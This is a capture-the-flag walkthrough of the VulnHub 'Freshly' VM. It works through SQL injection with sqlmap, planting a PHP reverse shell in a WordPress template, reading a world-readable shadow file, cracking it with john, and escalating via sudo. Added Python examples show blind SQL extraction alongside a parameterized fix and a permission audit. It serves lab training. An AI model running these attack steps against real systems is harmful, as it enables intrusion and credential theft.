[Hacking series] – TopHatSec:Freshly

Written by  on May 28, 2015 

Code name: Freshly

Webpage: http://www.top-hat-sec.com/r4v3ns-blog/new-vm-challenge-freshly

VM Download: http://download.vulnhub.com/tophatsec/Freshly.ova

Challenge: Start the VM, hack your way into the system and get root.

First of all we start the Freshly VM, then our Kali Linux (or whatever) box. With both boxes running, we simply look for our victim on the network.

We start by using netdiscover on Kali Linux to look for our victim

#netdiscover

[screenshot 1]

Someone told me a long time ago that true hackers can complete the whole penetration test process using only 2 or 3 tools. So if you want a "second opinion" you can also use netcat and bash scripting to scan for live hosts on the network.

# for i in {1..254}; do nc -v -n -z -w 1 192.168.11.$i 80; done

This checks every host in the /24 for an open port 80 (-z: connect only, send no data; -w 1: one-second timeout per host; -n: no DNS lookups; -v so that successful connects are printed).

[screenshot 2]

According to both results, netdiscover and netcat, our victim is probably 192.168.11.7: port 80 is open and the MAC vendor is Cadmus Computer Systems (VirtualBox). Let's dig a little deeper now:

#nmap -Pn -A 192.168.11.7

And what we get is:

[screenshot 3]

Ports 80, 443 and 8080 are open, Apache is running and the box looks like Linux. Port 80 open with Apache on it? Let's check it in the browser.

[screenshot 4]

Lelz. Looks like the "challenge" starts here. As no sensitive information was found on the index, we can use tools like nikto or w3af to see if we can find more interesting web directories.

# nikto -h http://192.168.11.7

[screenshot 5]

As expected, some hidden directories were found on the server. The phpmyadmin directory is the interesting one: if phpmyadmin is there, the remote host is most likely running PHP and MySQL. Let's browse to login.php now.

[screenshot 6]

A simple login form. Before making any decision, we can look at the HTML source code (use the source, Luke!).

[screenshot 7]

What we have here is an HTML form that posts to itself and sends user and password fields. From this point we have 2 options: we can try some software (like hydra) to brute-force the web form, or we can check if that simple web app is vulnerable to SQL injection. I choose the second.

# sqlmap -u "http://192.168.11.7/login.php" --data="user=a&password=b&s=Submit" --dbs --risk 5 --level 3

[screenshot 8]

Nice. SQL injection found; the next step is to take a look at the server's databases.

[screenshot 9]

And here are our victim's databases. Now that we have this we should spend some time looking at their content: users, passwords and other sensitive information.

# sqlmap -u "http://192.168.11.7/login.php" --data="user=a&password=b&s=Submit" -D wordpress8080 -T users --dump --risk 5 --level 3 --threads 9

After a few minutes useful information was found:

[screenshot 10]

Et voilà! A user:password pair. Since we found a username and its associated password in a database called "wordpress8080", and according to our recent scan our target has port 8080 open, let's try to log in.

http://192.168.11.7:8080/wordpress/wp-login.php

[screenshot 11]

Admin:SuperSecretPassword and we are in.
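Before moving on, it is worth seeing why that login form fell to sqlmap and how `--dump` could read a whole table through a form that only answers "logged in" or "not logged in". The following is an added example, not code from the Freshly VM or from the original post: the real login.php is not shown here, so the vulnerable query is a reconstruction of the usual string-concatenation pattern, and the `users` table is a constructed stand-in (SQLite in memory instead of MySQL, with an assumed column layout and a plaintext row). It also shows the parameterized query that closes the hole.

```python
"""Why login.php fell to sqlmap, and how --dump can read a table through it.

Added example, not code from the Freshly VM or the original post: the real
login.php is not shown there, so the vulnerable query is a reconstruction
of the usual pattern, and the 'users' table below is a constructed stand-in
(SQLite in memory instead of MySQL)."""
import sqlite3


def make_db():
    """Constructed sample table; column names and the plaintext row are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'SuperSecretPassword')")
    conn.commit()
    return conn


def vulnerable_login(conn, user, password):
    """The bug: form fields are glued into the SQL text, so they can rewrite the query."""
    query = "SELECT user FROM users WHERE user = '%s' AND password = '%s'" % (user, password)
    return conn.execute(query).fetchone() is not None


def safe_login(conn, user, password):
    """The fix: bound parameters reach the engine as data, never as SQL syntax."""
    query = "SELECT user FROM users WHERE user = ? AND password = ?"
    return conn.execute(query, (user, password)).fetchone() is not None


def blind_extract(conn, target="(SELECT password FROM users WHERE user = 'admin')", max_len=64):
    """Boolean-based blind extraction, the technique behind sqlmap's --dump here:
    the login only answers yes/no, so each character is recovered by asking
    'is character N of the secret equal to code C?' and watching the answer."""
    secret = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            # unicode() avoids quoting the guessed char; '-- ' comments out the password clause
            payload = "' OR unicode(substr(%s, %d, 1)) = %d -- " % (target, pos, code)
            if vulnerable_login(conn, payload, "irrelevant"):
                secret += chr(code)
                break
        else:
            break  # no character matched: end of the value
    return secret


if __name__ == "__main__":
    db = make_db()
    print("bypass via vulnerable query:", vulnerable_login(db, "admin' -- ", "wrong"))
    print("same payload on safe query:", safe_login(db, "admin' -- ", "wrong"))
    print("extracted through the oracle:", blind_extract(db))
```

Note that `blind_extract` never sees the database directly; it only calls the login routine, exactly as sqlmap only sees HTTP responses. Every character costs up to 95 requests, which is why sqlmap took "a few minutes" and why `--threads` helps.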

What do we know? We have a remote server running Linux with PHP and MySQL. WordPress is installed and we have admin access to it. In our next step we will use our admin account on the CMS to execute evil PHP code and get a shell on the system.

There are multiple ways to make WordPress execute PHP code of our choosing: we can edit the 404 error template or other PHP files included in the theme, edit configuration files, or simply install a plug-in called "php insert" that allows inserting PHP code into posts and pages. We will edit the 404 template with the php-reverse-shell and get a shell on the system.

So first we start a netcat listener on port 9999 to wait for our reverse shell:

# nc -lvp 9999

[screenshot 12]

Then we edit our php-reverse-shell.php code, setting our IP address and our listener's port:

[screenshot 13]

Now we paste the code into the 404 template file in the theme editor on WordPress, just like this:

[screenshot 14]

All we have to do now is browse to the 404 template file (or to any non-existent page, which makes WordPress render that template) and the shell will appear in our netcat window.

[screenshot 15]

Wonderful, we are in. The next step is getting root on the system. When the goal is privilege escalation on a Linux system, the first step can be checking the kernel for possible exploits; the second is checking for weaknesses and misconfigurations in the file system. We start by checking the kernel with

#uname -a

[screenshot 16]

Hmm, the kernel seems up to date and hard to exploit, so let's check the file system. The following command lists every file under /etc that is owned by root and has both the read and execute bits set for "other" (-perm -MODE requires all the given bits, so a file that is merely world-readable, say a 644 shadow, would not show up; run it a second time with -o+r to catch those as well).

# find /etc -user root -perm -o+rx

[screenshot 17]

wtf? It seems that the system's shadow file is world-readable. Now, if we take a look inside...

[screenshot 18]

Got it! Shadow file readable and 2 user accounts found. Now we can try to crack it with john (unshadow merges passwd and shadow into the format john expects).
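The find one-liner above is worth generalizing before moving on to cracking. The script below is an added example, not part of the original post: it walks a directory tree from the low-privileged shell, reports every regular file the "other" class can read, and separates what `find -perm -o+rx` would have listed from the world-readable-but-not-executable files that test silently misses. The `SENSITIVE_NAMES` set and the `demo()` directory layout are constructed (a temp dir standing in for /etc, so it runs offline); on the target you would call `audit_tree("/etc", owner_uid=0)`.

```python
"""Generalizing the `find /etc -user root -perm -o+rx` step: list regular files
that the 'other' class can read, and flag the ones that must never be.

Added example, not part of the original post. Assumptions: run as the
low-privileged shell user on the target; the demo builds a constructed
directory in a temp dir instead of touching /etc, and SENSITIVE_NAMES is
the usual set of Linux credential files."""
import os
import stat
import tempfile

SENSITIVE_NAMES = {"shadow", "gshadow", "shadow-", "gshadow-"}


def audit_tree(root, owner_uid=None):
    """Return sorted (relative path, octal mode, tag) for every regular file under root
    that is readable by 'other', optionally restricted to one owner (0 for root).

    tag is 'CRITICAL' for a readable credential file, 'o+rx' for files the page's
    find -perm -o+rx would also list, and 'o+r' for world-readable files without the
    execute bit, which that find test misses because -perm -MODE needs all bits set."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are normal for an unprivileged user
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and devices are out of scope here
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            if not st.st_mode & stat.S_IROTH:
                continue  # not readable by 'other': nothing to report
            if name in SENSITIVE_NAMES:
                tag = "CRITICAL"
            elif st.st_mode & stat.S_IXOTH:
                tag = "o+rx"
            else:
                tag = "o+r"
            findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(st.st_mode)), tag))
    return sorted(findings)


def demo():
    """Constructed /etc look-alike: a world-readable shadow (the Freshly mistake, mode
    assumed 644 here), a normal passwd, a correctly locked-down sudoers and a script."""
    with tempfile.TemporaryDirectory() as root:
        layout = {"shadow": 0o644, "passwd": 0o644, "sudoers": 0o440, "rc.local": 0o755}
        for name, mode in layout.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("constructed\n")
            os.chmod(path, mode)  # explicit mode, so the umask does not interfere
        return audit_tree(root, owner_uid=os.getuid())


if __name__ == "__main__":
    for rel, mode, tag in demo():
        print("%-9s %s %s" % (tag, mode, rel))
    # on the target: audit_tree("/etc", owner_uid=0)
```

A 644 shadow is the classic case the single `-o+rx` run would miss: passwd is supposed to be world-readable, shadow never is, and the difference is one bit that the find test does not look at.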

# unshadow passwd shadow > tocrack

# john tocrack

[screenshot 19]

Nice, both user accounts cracked.

[screenshot 20]

SuperSecretPassword and candycane. Finally we switch to the account called "user". Since su needs a proper tty to prompt for the password, we first use python to upgrade our netcat shell:

# python -c 'import pty; pty.spawn("/bin/bash")'

[screenshot 21]

Login successful. Now, if our user is in the sudoers file…

[screenshot 22]

Here it is, game over P-)

Category : hacking series
